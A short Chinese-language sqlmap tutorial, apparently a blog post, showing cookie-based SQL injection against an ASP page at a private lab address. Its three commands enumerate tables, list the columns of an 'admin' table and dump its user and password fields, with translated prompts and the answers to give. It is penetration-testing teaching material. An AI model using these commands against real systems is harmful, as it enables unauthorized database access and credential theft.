sqlmap之(五)----Cookie注入实战

(1) cookie注入,猜解表


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2


sqlmap之(五)----Cookie注入实战_第1张图片


do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"


sqlmap之(五)----Cookie注入实战_第2张图片


Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"


sqlmap之(五)----Cookie注入实战_第3张图片


do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。


sqlmap之(五)----Cookie注入实战_第4张图片


等待一下就出结果了。


sqlmap之(五)----Cookie注入实战_第5张图片


(2) 猜解字段,(通过1的表猜解字段,假如表为admin)


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2

sqlmap之(五)----Cookie注入实战_第6张图片


sqlmap之(五)----Cookie注入实战_第7张图片


(3) 猜解内容


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2

sqlmap之(五)----Cookie注入实战_第8张图片


猜出的内容为


sqlmap之(五)----Cookie注入实战_第9张图片

你可能感兴趣的:(SQL注入)